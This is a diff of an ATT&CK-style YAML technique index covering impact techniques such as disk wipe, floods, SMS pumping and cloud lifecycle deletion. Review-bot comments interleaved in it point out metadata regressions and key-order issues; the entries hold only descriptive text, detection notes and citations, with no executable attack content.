@@ -56399,7 +57081,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56421,13 +57103,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -56519,13 +57199,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56534,7 +57213,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -56551,17 +57229,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
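Review bot: the platform list for Direct Network Flood drops Azure AD, Office 365, SaaS and Google Workspace and `x_mitre_version` goes '1.3' → '1.4', but nothing in this hunk touches anything derived from `x_mitre_platforms`; if platform-specific indexes or filters are generated from that list, regenerate them in the same change so those platforms stop listing a technique that no longer applies to them. The `- x_mitre_modified_by_ref` removal here is only a reorder (the key is re-added at the end of the object in the next hunk), so that part is fine.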
@@ -56586,7 +57259,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -56624,7 +57298,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
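Review bot: the `modified` timestamp on External Defacement moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-03-25T19:34:37.539Z', and the same regression appears on OS Exhaustion Flood ('2023-05-09' → '2023-03-30') and Disk Wipe ('2023-05-09' → '2023-04-20') further down. A `modified` that is older than the value it replaces usually means the imported snapshot predates what was previously in the file, so confirm which upstream bundle this was generated from before merging.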
@@ -56658,12 +57332,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
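Review bot: External Defacement loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` (the two `-` lines just above its `atomic_tests: []`) with no `+ x_mitre_attack_spec_version: 3.2.0` visible in this hunk, unlike every other object in the diff, which gets the 3.2.0 line appended at the end of the object. Check that the key is re-added in the unchanged part of that object; otherwise this one technique ends up with no spec version at all.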
@@ -56728,42 +57400,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
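Review bot: both new sub-techniques, T1485.001 (`+ name: Lifecycle-Triggered Deletion`) and T1496.003 (`+ name: SMS Pumping`), land with `x_mitre_detection: ''` and `atomic_tests: []`, so the only detection hook each carries is its single data source (`Cloud Storage: Cloud Storage Modification` and `Application Log: Application Log Content` respectively); if the empty string is what upstream ships that is acceptable, but it is worth stating in the commit message so nobody reads it as a generator bug. Style point: the two new keys are inserted ahead of the existing `T1499.003:` rather than after it, which is why the hunk shows `- T1499.003:` at the top and `+ T1499.003:` near the bottom and makes Application Exhaustion Flood look rewritten; appending new keys after existing ones keeps future diffs reviewable.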
@@ -56774,13 +57531,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -56788,12 +57552,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -56854,109 +57639,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
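Review bot: in the Service Stop description the lines `- such as MSExchangeIS` and `, which will make Exchange content inaccessible` (and their `+` counterparts) are split mid-sentence, with the continuation line carrying no diff marker; that pattern usually means inline markup around `MSExchangeIS` was stripped when the file was rendered, and the same split shows up at `ChangeServiceConfigW` in the detection text of the next hunk. Check the raw file to confirm the scalar is intact and that the only real change in that sentence is the citation moving to the sentence end (`inaccessible.(Citation: Novetta Blockbuster)`). Separately, the FireEye APT38 reference in Stored Data Manipulation changes its URL from content.fireeye.com to a mandiant.com PDF while keeping the same description; the same reference on Runtime Data Manipulation further down gets the same URL, so the two stay consistent.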
@@ -56965,10 +57720,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -56979,39 +57738,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
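Review bot: the unchanged context line `identifier: T1489` (between `x_mitre_modified_by_ref` and `atomic_tests: []`) makes Service Stop the only technique in this diff that carries an `identifier` key alongside `external_id`. It is not introduced here, but since this change already rewrites the object's key order it is the natural place to either drop the duplicate or add the key consistently to the other techniques.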
@@ -57029,13 +57786,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57043,36 +57807,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
